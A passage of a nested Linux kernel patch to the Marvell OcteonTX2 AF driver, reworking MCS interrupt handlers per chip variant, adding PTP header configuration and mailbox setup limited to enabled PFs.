++	if (intr & BIT_ULL(1))
++		reg = (dir == MCS_RX) ? MCSX_BBE_RX_SLAVE_DFIFO_OVERFLOW_0 :
++					MCSX_BBE_TX_SLAVE_DFIFO_OVERFLOW_0;
++	else
++		reg = (dir == MCS_RX) ? MCSX_BBE_RX_SLAVE_PLFIFO_OVERFLOW_0 :
++					MCSX_BBE_TX_SLAVE_PLFIFO_OVERFLOW_0;
++	val = mcs_reg_read(mcs, reg);
+ 
+-	for (i = 0; i < MCS_MAX_BBE_INT; i++) {
+-		if (!(intr & BIT_ULL(i)))
++	/* policy/data over flow occurred */
++	for (lmac = 0; lmac < mcs->hw->lmac_cnt; lmac++) {
++		if (!(val & BIT_ULL(lmac)))
+ 			continue;
+-
+-		/* Lower nibble denotes data fifo overflow interrupts and
+-		 * upper nibble indicates policy fifo overflow interrupts.
+-		 */
+-		if (intr & 0xFULL)
+-			event.intr_mask = (dir == MCS_RX) ?
+-					  MCS_BBE_RX_DFIFO_OVERFLOW_INT :
+-					  MCS_BBE_TX_DFIFO_OVERFLOW_INT;
+-		else
+-			event.intr_mask = (dir == MCS_RX) ?
+-					  MCS_BBE_RX_PLFIFO_OVERFLOW_INT :
+-					  MCS_BBE_TX_PLFIFO_OVERFLOW_INT;
+-
+-		/* Notify the lmac_id info which ran into BBE fatal error */
+-		event.lmac_id = i & 0x3ULL;
+-		mcs_add_intr_wq_entry(mcs, &event);
++		dev_warn(mcs->dev, "BEE:Policy or data overflow occurred on lmac:%d\n", lmac);
+ 	}
+ }
+ 
+-static void mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir)
++void cn10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr,
++				 enum mcs_direction dir)
+ {
+-	struct mcs_intr_event event = { 0 };
+-	int i;
++	int lmac;
+ 
+-	if (!(intr & MCS_PAB_INT_MASK))
++	if (!(intr & 0xFFFFFULL))
+ 		return;
+ 
+-	event.mcs_id = mcs->mcs_id;
+-	event.pcifunc = mcs->pf_map[0];
+-
+-	for (i = 0; i < MCS_MAX_PAB_INT; i++) {
+-		if (!(intr & BIT_ULL(i)))
+-			continue;
+-
+-		event.intr_mask = (dir == MCS_RX) ? MCS_PAB_RX_CHAN_OVERFLOW_INT :
+-				  MCS_PAB_TX_CHAN_OVERFLOW_INT;
+-
+-		/* Notify the lmac_id info which ran into PAB fatal error */
+-		event.lmac_id = i;
+-		mcs_add_intr_wq_entry(mcs, &event);
++	for (lmac = 0; lmac < mcs->hw->lmac_cnt; lmac++) {
++		if (intr & BIT_ULL(lmac))
++			dev_warn(mcs->dev, "PAB: overflow occurred on lmac:%d\n", lmac);
+ 	}
+ }
+ 
+@@ -988,9 +980,8 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	struct mcs *mcs = (struct mcs *)mcs_irq;
+ 	u64 intr, cpm_intr, bbe_intr, pab_intr;
+ 
+-	/* Disable and clear the interrupt */
++	/* Disable  the interrupt */
+ 	mcs_reg_write(mcs, MCSX_IP_INT_ENA_W1C, BIT_ULL(0));
+-	mcs_reg_write(mcs, MCSX_IP_INT, BIT_ULL(0));
+ 
+ 	/* Check which block has interrupt*/
+ 	intr = mcs_reg_read(mcs, MCSX_TOP_SLAVE_INT_SUM);
+@@ -1037,7 +1028,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* BBE RX */
+ 	if (intr & MCS_BBE_RX_INT_ENA) {
+ 		bbe_intr = mcs_reg_read(mcs, MCSX_BBE_RX_SLAVE_BBE_INT);
+-		mcs_bbe_intr_handler(mcs, bbe_intr, MCS_RX);
++		mcs->mcs_ops->mcs_bbe_intr_handler(mcs, bbe_intr, MCS_RX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_INTR_RW, 0);
+@@ -1047,7 +1038,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* BBE TX */
+ 	if (intr & MCS_BBE_TX_INT_ENA) {
+ 		bbe_intr = mcs_reg_read(mcs, MCSX_BBE_TX_SLAVE_BBE_INT);
+-		mcs_bbe_intr_handler(mcs, bbe_intr, MCS_TX);
++		mcs->mcs_ops->mcs_bbe_intr_handler(mcs, bbe_intr, MCS_TX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_INTR_RW, 0);
+@@ -1057,7 +1048,7 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* PAB RX */
+ 	if (intr & MCS_PAB_RX_INT_ENA) {
+ 		pab_intr = mcs_reg_read(mcs, MCSX_PAB_RX_SLAVE_PAB_INT);
+-		mcs_pab_intr_handler(mcs, pab_intr, MCS_RX);
++		mcs->mcs_ops->mcs_pab_intr_handler(mcs, pab_intr, MCS_RX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_INTR_RW, 0);
+@@ -1067,14 +1058,15 @@ static irqreturn_t mcs_ip_intr_handler(int irq, void *mcs_irq)
+ 	/* PAB TX */
+ 	if (intr & MCS_PAB_TX_INT_ENA) {
+ 		pab_intr = mcs_reg_read(mcs, MCSX_PAB_TX_SLAVE_PAB_INT);
+-		mcs_pab_intr_handler(mcs, pab_intr, MCS_TX);
++		mcs->mcs_ops->mcs_pab_intr_handler(mcs, pab_intr, MCS_TX);
+ 
+ 		/* Clear the interrupt */
+ 		mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_INTR_RW, 0);
+ 		mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT, pab_intr);
+ 	}
+ 
+-	/* Enable the interrupt */
++	/* Clear and enable the interrupt */
++	mcs_reg_write(mcs, MCSX_IP_INT, BIT_ULL(0));
+ 	mcs_reg_write(mcs, MCSX_IP_INT_ENA_W1S, BIT_ULL(0));
+ 
+ 	return IRQ_HANDLED;
+@@ -1156,7 +1148,7 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 		return ret;
+ 	}
+ 
+-	ret = request_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP),
++	ret = request_irq(pci_irq_vector(mcs->pdev, mcs->hw->ip_vec),
+ 			  mcs_ip_intr_handler, 0, "MCS_IP", mcs);
+ 	if (ret) {
+ 		dev_err(mcs->dev, "MCS IP irq registration failed\n");
+@@ -1175,11 +1167,11 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	mcs_reg_write(mcs, MCSX_CPM_TX_SLAVE_TX_INT_ENB, 0x7ULL);
+ 	mcs_reg_write(mcs, MCSX_CPM_RX_SLAVE_RX_INT_ENB, 0x7FULL);
+ 
+-	mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_ENB, 0xff);
+-	mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_ENB, 0xff);
++	mcs_reg_write(mcs, MCSX_BBE_RX_SLAVE_BBE_INT_ENB, 0xFFULL);
++	mcs_reg_write(mcs, MCSX_BBE_TX_SLAVE_BBE_INT_ENB, 0xFFULL);
+ 
+-	mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_ENB, 0xff);
+-	mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_ENB, 0xff);
++	mcs_reg_write(mcs, MCSX_PAB_RX_SLAVE_PAB_INT_ENB, 0xFFFFFULL);
++	mcs_reg_write(mcs, MCSX_PAB_TX_SLAVE_PAB_INT_ENB, 0xFFFFFULL);
+ 
+ 	mcs->tx_sa_active = alloc_mem(mcs, mcs->hw->sc_entries);
+ 	if (!mcs->tx_sa_active) {
+@@ -1190,7 +1182,7 @@ static int mcs_register_interrupts(struct mcs *mcs)
+ 	return ret;
+ 
+ free_irq:
+-	free_irq(pci_irq_vector(mcs->pdev, MCS_INT_VEC_IP), mcs);
++	free_irq(pci_irq_vector(mcs->pdev, mcs->hw->ip_vec), mcs);
+ exit:
+ 	pci_free_irq_vectors(mcs->pdev);
+ 	mcs->num_vec = 0;
+@@ -1325,8 +1317,11 @@ void mcs_reset_port(struct mcs *mcs, u8 port_id, u8 reset)
+ void mcs_set_lmac_mode(struct mcs *mcs, int lmac_id, u8 mode)
+ {
+ 	u64 reg;
++	int id = lmac_id * 2;
+ 
+-	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG(lmac_id * 2);
++	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG(id);
++	mcs_reg_write(mcs, reg, (u64)mode);
++	reg = MCSX_MCS_TOP_SLAVE_CHANNEL_CFG((id + 1));
+ 	mcs_reg_write(mcs, reg, (u64)mode);
+ }
+ 
+@@ -1484,6 +1479,7 @@ void cn10kb_mcs_set_hw_capabilities(struct mcs *mcs)
+ 	hw->lmac_cnt = 20;		/* lmacs/ports per mcs block */
+ 	hw->mcs_x2p_intf = 5;		/* x2p clabration intf */
+ 	hw->mcs_blks = 1;		/* MCS blocks */
++	hw->ip_vec = MCS_CN10KB_INT_VEC_IP; /* IP vector */
+ }
+ 
+ static struct mcs_ops cn10kb_mcs_ops = {
+@@ -1492,6 +1488,8 @@ static struct mcs_ops cn10kb_mcs_ops = {
+ 	.mcs_tx_sa_mem_map_write	= cn10kb_mcs_tx_sa_mem_map_write,
+ 	.mcs_rx_sa_mem_map_write	= cn10kb_mcs_rx_sa_mem_map_write,
+ 	.mcs_flowid_secy_map		= cn10kb_mcs_flowid_secy_map,
++	.mcs_bbe_intr_handler		= cn10kb_mcs_bbe_intr_handler,
++	.mcs_pab_intr_handler		= cn10kb_mcs_pab_intr_handler,
+ };
+ 
+ static int mcs_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+@@ -1592,7 +1590,7 @@ static void mcs_remove(struct pci_dev *pdev)
+ 
+ 	/* Set MCS to external bypass */
+ 	mcs_set_external_bypass(mcs, true);
+-	free_irq(pci_irq_vector(pdev, MCS_INT_VEC_IP), mcs);
++	free_irq(pci_irq_vector(pdev, mcs->hw->ip_vec), mcs);
+ 	pci_free_irq_vectors(pdev);
+ 	pci_release_regions(pdev);
+ 	pci_disable_device(pdev);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+index 64dc2b80e15dd..0f89dcb764654 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs.h
+@@ -43,24 +43,15 @@
+ /* Reserved resources for default bypass entry */
+ #define MCS_RSRC_RSVD_CNT		1
+ 
+-/* MCS Interrupt Vector Enumeration */
+-enum mcs_int_vec_e {
+-	MCS_INT_VEC_MIL_RX_GBL		= 0x0,
+-	MCS_INT_VEC_MIL_RX_LMACX	= 0x1,
+-	MCS_INT_VEC_MIL_TX_LMACX	= 0x5,
+-	MCS_INT_VEC_HIL_RX_GBL		= 0x9,
+-	MCS_INT_VEC_HIL_RX_LMACX	= 0xa,
+-	MCS_INT_VEC_HIL_TX_GBL		= 0xe,
+-	MCS_INT_VEC_HIL_TX_LMACX	= 0xf,
+-	MCS_INT_VEC_IP			= 0x13,
+-	MCS_INT_VEC_CNT			= 0x14,
+-};
++/* MCS Interrupt Vector */
++#define MCS_CNF10KB_INT_VEC_IP	0x13
++#define MCS_CN10KB_INT_VEC_IP	0x53
+ 
+ #define MCS_MAX_BBE_INT			8ULL
+ #define MCS_BBE_INT_MASK		0xFFULL
+ 
+-#define MCS_MAX_PAB_INT			4ULL
+-#define MCS_PAB_INT_MASK		0xFULL
++#define MCS_MAX_PAB_INT		8ULL
++#define MCS_PAB_INT_MASK	0xFULL
+ 
+ #define MCS_BBE_RX_INT_ENA		BIT_ULL(0)
+ #define MCS_BBE_TX_INT_ENA		BIT_ULL(1)
+@@ -137,6 +128,7 @@ struct hwinfo {
+ 	u8 lmac_cnt;
+ 	u8 mcs_blks;
+ 	unsigned long	lmac_bmap; /* bitmap of enabled mcs lmac */
++	u16 ip_vec;
+ };
+ 
+ struct mcs {
+@@ -165,6 +157,8 @@ struct mcs_ops {
+ 	void	(*mcs_tx_sa_mem_map_write)(struct mcs *mcs, struct mcs_tx_sc_sa_map *map);
+ 	void	(*mcs_rx_sa_mem_map_write)(struct mcs *mcs, struct mcs_rx_sc_sa_map *map);
+ 	void	(*mcs_flowid_secy_map)(struct mcs *mcs, struct secy_mem_map *map, int dir);
++	void	(*mcs_bbe_intr_handler)(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++	void	(*mcs_pab_intr_handler)(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ };
+ 
+ extern struct pci_driver mcs_driver;
+@@ -219,6 +213,8 @@ void cn10kb_mcs_tx_sa_mem_map_write(struct mcs *mcs, struct mcs_tx_sc_sa_map *ma
+ void cn10kb_mcs_flowid_secy_map(struct mcs *mcs, struct secy_mem_map *map, int dir);
+ void cn10kb_mcs_rx_sa_mem_map_write(struct mcs *mcs, struct mcs_rx_sc_sa_map *map);
+ void cn10kb_mcs_parser_cfg(struct mcs *mcs);
++void cn10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++void cn10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ 
+ /* CNF10K-B APIs */
+ struct mcs_ops *cnf10kb_get_mac_ops(void);
+@@ -229,6 +225,8 @@ void cnf10kb_mcs_rx_sa_mem_map_write(struct mcs *mcs, struct mcs_rx_sc_sa_map *m
+ void cnf10kb_mcs_parser_cfg(struct mcs *mcs);
+ void cnf10kb_mcs_tx_pn_thresh_reached_handler(struct mcs *mcs);
+ void cnf10kb_mcs_tx_pn_wrapped_handler(struct mcs *mcs);
++void cnf10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
++void cnf10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr, enum mcs_direction dir);
+ 
+ /* Stats APIs */
+ void mcs_get_sc_stats(struct mcs *mcs, struct mcs_sc_stats *stats, int id, int dir);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
+index 7b62054144286..9f9b904ab2cd0 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_cnf10kb.c
+@@ -13,6 +13,8 @@ static struct mcs_ops cnf10kb_mcs_ops   = {
+ 	.mcs_tx_sa_mem_map_write	= cnf10kb_mcs_tx_sa_mem_map_write,
+ 	.mcs_rx_sa_mem_map_write	= cnf10kb_mcs_rx_sa_mem_map_write,
+ 	.mcs_flowid_secy_map		= cnf10kb_mcs_flowid_secy_map,
++	.mcs_bbe_intr_handler		= cnf10kb_mcs_bbe_intr_handler,
++	.mcs_pab_intr_handler		= cnf10kb_mcs_pab_intr_handler,
+ };
+ 
+ struct mcs_ops *cnf10kb_get_mac_ops(void)
+@@ -31,6 +33,7 @@ void cnf10kb_mcs_set_hw_capabilities(struct mcs *mcs)
+ 	hw->lmac_cnt = 4;		/* lmacs/ports per mcs block */
+ 	hw->mcs_x2p_intf = 1;		/* x2p clabration intf */
+ 	hw->mcs_blks = 7;		/* MCS blocks */
++	hw->ip_vec = MCS_CNF10KB_INT_VEC_IP; /* IP vector */
+ }
+ 
+ void cnf10kb_mcs_parser_cfg(struct mcs *mcs)
+@@ -212,3 +215,63 @@ void cnf10kb_mcs_tx_pn_wrapped_handler(struct mcs *mcs)
+ 		mcs_add_intr_wq_entry(mcs, &event);
+ 	}
+ }
++
++void cnf10kb_mcs_bbe_intr_handler(struct mcs *mcs, u64 intr,
++				  enum mcs_direction dir)
++{
++	struct mcs_intr_event event = { 0 };
++	int i;
++
++	if (!(intr & MCS_BBE_INT_MASK))
++		return;
++
++	event.mcs_id = mcs->mcs_id;
++	event.pcifunc = mcs->pf_map[0];
++
++	for (i = 0; i < MCS_MAX_BBE_INT; i++) {
++		if (!(intr & BIT_ULL(i)))
++			continue;
++
++		/* Lower nibble denotes data fifo overflow interrupts and
++		 * upper nibble indicates policy fifo overflow interrupts.
++		 */
++		if (intr & 0xFULL)
++			event.intr_mask = (dir == MCS_RX) ?
++					  MCS_BBE_RX_DFIFO_OVERFLOW_INT :
++					  MCS_BBE_TX_DFIFO_OVERFLOW_INT;
++		else
++			event.intr_mask = (dir == MCS_RX) ?
++					  MCS_BBE_RX_PLFIFO_OVERFLOW_INT :
++					  MCS_BBE_TX_PLFIFO_OVERFLOW_INT;
++
++		/* Notify the lmac_id info which ran into BBE fatal error */
++		event.lmac_id = i & 0x3ULL;
++		mcs_add_intr_wq_entry(mcs, &event);
++	}
++}
++
++void cnf10kb_mcs_pab_intr_handler(struct mcs *mcs, u64 intr,
++				  enum mcs_direction dir)
++{
++	struct mcs_intr_event event = { 0 };
++	int i;
++
++	if (!(intr & MCS_PAB_INT_MASK))
++		return;
++
++	event.mcs_id = mcs->mcs_id;
++	event.pcifunc = mcs->pf_map[0];
++
++	for (i = 0; i < MCS_MAX_PAB_INT; i++) {
++		if (!(intr & BIT_ULL(i)))
++			continue;
++
++		event.intr_mask = (dir == MCS_RX) ?
++				  MCS_PAB_RX_CHAN_OVERFLOW_INT :
++				  MCS_PAB_TX_CHAN_OVERFLOW_INT;
++
++		/* Notify the lmac_id info which ran into PAB fatal error */
++		event.lmac_id = i;
++		mcs_add_intr_wq_entry(mcs, &event);
++	}
++}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+index c95a8b8f5eaf7..f3ab01fc363c8 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_reg.h
+@@ -97,6 +97,7 @@
+ #define MCSX_PEX_TX_SLAVE_VLAN_CFGX(a)          (0x46f8ull + (a) * 0x8ull)
+ #define MCSX_PEX_TX_SLAVE_CUSTOM_TAG_REL_MODE_SEL(a)	(0x788ull + (a) * 0x8ull)
+ #define MCSX_PEX_TX_SLAVE_PORT_CONFIG(a)		(0x4738ull + (a) * 0x8ull)
++#define MCSX_PEX_RX_SLAVE_PORT_CFGX(a)		(0x3b98ull + (a) * 0x8ull)
+ #define MCSX_PEX_RX_SLAVE_RULE_ETYPE_CFGX(a) ({	\
+ 	u64 offset;					\
+ 							\
+@@ -275,7 +276,10 @@
+ #define MCSX_BBE_RX_SLAVE_CAL_ENTRY			0x180ull
+ #define MCSX_BBE_RX_SLAVE_CAL_LEN			0x188ull
+ #define MCSX_PAB_RX_SLAVE_FIFO_SKID_CFGX(a)		(0x290ull + (a) * 0x40ull)
+-
++#define MCSX_BBE_RX_SLAVE_DFIFO_OVERFLOW_0		0xe20
++#define MCSX_BBE_TX_SLAVE_DFIFO_OVERFLOW_0		0x1298
++#define MCSX_BBE_RX_SLAVE_PLFIFO_OVERFLOW_0		0xe40
++#define MCSX_BBE_TX_SLAVE_PLFIFO_OVERFLOW_0		0x12b8
+ #define MCSX_BBE_RX_SLAVE_BBE_INT ({	\
+ 	u64 offset;			\
+ 					\
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+index eb25e458266ca..dfd23580e3b8e 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mcs_rvu_if.c
+@@ -11,6 +11,7 @@
+ 
+ #include "mcs.h"
+ #include "rvu.h"
++#include "mcs_reg.h"
+ #include "lmac_common.h"
+ 
+ #define M(_name, _id, _fn_name, _req_type, _rsp_type)			\
+@@ -32,6 +33,42 @@ static struct _req_type __maybe_unused					\
+ MBOX_UP_MCS_MESSAGES
+ #undef M
+ 
++void rvu_mcs_ptp_cfg(struct rvu *rvu, u8 rpm_id, u8 lmac_id, bool ena)
++{
++	struct mcs *mcs;
++	u64 cfg;
++	u8 port;
++
++	if (!rvu->mcs_blk_cnt)
++		return;
++
++	/* When ptp is enabled, RPM appends 8B header for all
++	 * RX packets. MCS PEX need to configure to skip 8B
++	 * during packet parsing.
++	 */
++
++	/* CNF10K-B */
++	if (rvu->mcs_blk_cnt > 1) {
++		mcs = mcs_get_pdata(rpm_id);
++		cfg = mcs_reg_read(mcs, MCSX_PEX_RX_SLAVE_PEX_CONFIGURATION);
++		if (ena)
++			cfg |= BIT_ULL(lmac_id);
++		else
++			cfg &= ~BIT_ULL(lmac_id);
++		mcs_reg_write(mcs, MCSX_PEX_RX_SLAVE_PEX_CONFIGURATION, cfg);
++		return;
++	}
++	/* CN10KB */
++	mcs = mcs_get_pdata(0);
++	port = (rpm_id * rvu->hw->lmac_per_cgx) + lmac_id;
++	cfg = mcs_reg_read(mcs, MCSX_PEX_RX_SLAVE_PORT_CFGX(port));
++	if (ena)
++		cfg |= BIT_ULL(0);
++	else
++		cfg &= ~BIT_ULL(0);
++	mcs_reg_write(mcs, MCSX_PEX_RX_SLAVE_PORT_CFGX(port), cfg);
++}
++
+ int rvu_mbox_handler_mcs_set_lmac_mode(struct rvu *rvu,
+ 				       struct mcs_set_lmac_mode *req,
+ 				       struct msg_rsp *rsp)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+index 3f5e09b77d4bd..873f081c030de 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.c
+@@ -2274,7 +2274,7 @@ static inline void rvu_afvf_mbox_up_handler(struct work_struct *work)
+ }
+ 
+ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+-				int num, int type)
++				int num, int type, unsigned long *pf_bmap)
+ {
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	int region;
+@@ -2286,6 +2286,9 @@ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+ 	 */
+ 	if (type == TYPE_AFVF) {
+ 		for (region = 0; region < num; region++) {
++			if (!test_bit(region, pf_bmap))
++				continue;
++
+ 			if (hw->cap.per_pf_mbox_regs) {
+ 				bar4 = rvu_read64(rvu, BLKADDR_RVUM,
+ 						  RVU_AF_PFX_BAR4_ADDR(0)) +
+@@ -2307,6 +2310,9 @@ static int rvu_get_mbox_regions(struct rvu *rvu, void **mbox_addr,
+ 	 * RVU_AF_PF_BAR4_ADDR register.
+ 	 */
+ 	for (region = 0; region < num; region++) {
++		if (!test_bit(region, pf_bmap))
++			continue;
++
+ 		if (hw->cap.per_pf_mbox_regs) {
+ 			bar4 = rvu_read64(rvu, BLKADDR_RVUM,
+ 					  RVU_AF_PFX_BAR4_ADDR(region));
+@@ -2335,20 +2341,41 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 	int err = -EINVAL, i, dir, dir_up;
+ 	void __iomem *reg_base;
+ 	struct rvu_work *mwork;
++	unsigned long *pf_bmap;
+ 	void **mbox_regions;
+ 	const char *name;
++	u64 cfg;
+ 
+-	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
+-	if (!mbox_regions)
++	pf_bmap = bitmap_zalloc(num, GFP_KERNEL);
++	if (!pf_bmap)
+ 		return -ENOMEM;
+ 
++	/* RVU VFs */
++	if (type == TYPE_AFVF)
++		bitmap_set(pf_bmap, 0, num);
++
++	if (type == TYPE_AFPF) {
++		/* Mark enabled PFs in bitmap */
++		for (i = 0; i < num; i++) {
++			cfg = rvu_read64(rvu, BLKADDR_RVUM, RVU_PRIV_PFX_CFG(i));
++			if (cfg & BIT_ULL(20))
++				set_bit(i, pf_bmap);
++		}
++	}
++
++	mbox_regions = kcalloc(num, sizeof(void *), GFP_KERNEL);
++	if (!mbox_regions) {
++		err = -ENOMEM;
++		goto free_bitmap;
++	}
++
+ 	switch (type) {
+ 	case TYPE_AFPF:
+ 		name = "rvu_afpf_mailbox";
+ 		dir = MBOX_DIR_AFPF;
+ 		dir_up = MBOX_DIR_AFPF_UP;
+ 		reg_base = rvu->afreg_base;
+-		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFPF);
++		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFPF, pf_bmap);
+ 		if (err)
+ 			goto free_regions;
+ 		break;
+@@ -2357,7 +2384,7 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		dir = MBOX_DIR_PFVF;
+ 		dir_up = MBOX_DIR_PFVF_UP;
+ 		reg_base = rvu->pfreg_base;
+-		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFVF);
++		err = rvu_get_mbox_regions(rvu, mbox_regions, num, TYPE_AFVF, pf_bmap);
+ 		if (err)
+ 			goto free_regions;
+ 		break;
+@@ -2388,16 +2415,19 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 	}
+ 
+ 	err = otx2_mbox_regions_init(&mw->mbox, mbox_regions, rvu->pdev,
+-				     reg_base, dir, num);
++				     reg_base, dir, num, pf_bmap);
+ 	if (err)
+ 		goto exit;
+ 
+ 	err = otx2_mbox_regions_init(&mw->mbox_up, mbox_regions, rvu->pdev,
+-				     reg_base, dir_up, num);
++				     reg_base, dir_up, num, pf_bmap);
+ 	if (err)
+ 		goto exit;
+ 
+ 	for (i = 0; i < num; i++) {
++		if (!test_bit(i, pf_bmap))
++			continue;
++
+ 		mwork = &mw->mbox_wrk[i];
+ 		mwork->rvu = rvu;
+ 		INIT_WORK(&mwork->work, mbox_handler);
+@@ -2406,8 +2436,7 @@ static int rvu_mbox_init(struct rvu *rvu, struct mbox_wq_info *mw,
+ 		mwork->rvu = rvu;
+ 		INIT_WORK(&mwork->work, mbox_up_handler);
+ 	}
+-	kfree(mbox_regions);
+-	return 0;
++	goto free_regions;
+ 
+ exit:
+ 	destroy_workqueue(mw->mbox_wq);
+@@ -2416,6 +2445,8 @@ unmap_regions:
+ 		iounmap((void __iomem *)mbox_regions[num]);
+ free_regions:
+ 	kfree(mbox_regions);
++free_bitmap:
++	bitmap_free(pf_bmap);
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index f6c45cf27caf4..f0502556d127f 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -899,6 +899,7 @@ int rvu_get_hwvf(struct rvu *rvu, int pcifunc);
+ /* CN10K MCS */
+ int rvu_mcs_init(struct rvu *rvu);
+ int rvu_mcs_flr_handler(struct rvu *rvu, u16 pcifunc);
++void rvu_mcs_ptp_cfg(struct rvu *rvu, u8 rpm_id, u8 lmac_id, bool ena);
+ void rvu_mcs_exit(struct rvu *rvu);
+ 
+ #endif /* RVU_H */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index 438b212fb54a7..83b342fa8d753 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -773,6 +773,8 @@ static int rvu_cgx_ptp_rx_cfg(struct rvu *rvu, u16 pcifunc, bool enable)
+ 	/* This flag is required to clean up CGX conf if app gets killed */
+ 	pfvf->hw_rx_tstamp_en = enable;
+ 
++	/* Inform MCS about 8B RX header */
++	rvu_mcs_ptp_cfg(rvu, cgx_id, lmac_id, enable);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
+index 7dbbc115cde42..f9faa5b23bb9d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cn10k.c
+@@ -60,13 +60,14 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 			   u64 iova, u64 *lmt_addr)
+ {
+ 	u64 pa, val, pf;
+-	int err;
++	int err = 0;
+ 
+ 	if (!iova) {
+ 		dev_err(rvu->dev, "%s Requested Null address for transulation\n", __func__);
+ 		return -EINVAL;
+ 	}
+ 
++	mutex_lock(&rvu->rsrc_lock);
+ 	rvu_write64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_REQ, iova);
+ 	pf = rvu_get_pf(pcifunc) & 0x1F;
+ 	val = BIT_ULL(63) | BIT_ULL(14) | BIT_ULL(13) | pf << 8 |
+@@ -76,12 +77,13 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 	err = rvu_poll_reg(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_RSP_STS, BIT_ULL(0), false);
+ 	if (err) {
+ 		dev_err(rvu->dev, "%s LMTLINE iova transulation failed\n", __func__);
+-		return err;
++		goto exit;
+ 	}
+ 	val = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_ADDR_RSP_STS);
+ 	if (val & ~0x1ULL) {
+ 		dev_err(rvu->dev, "%s LMTLINE iova transulation failed err:%llx\n", __func__, val);
+-		return -EIO;
++		err = -EIO;
++		goto exit;
+ 	}
+ 	/* PA[51:12] = RVU_AF_SMMU_TLN_FLIT0[57:18]
+ 	 * PA[11:0] = IOVA[11:0]
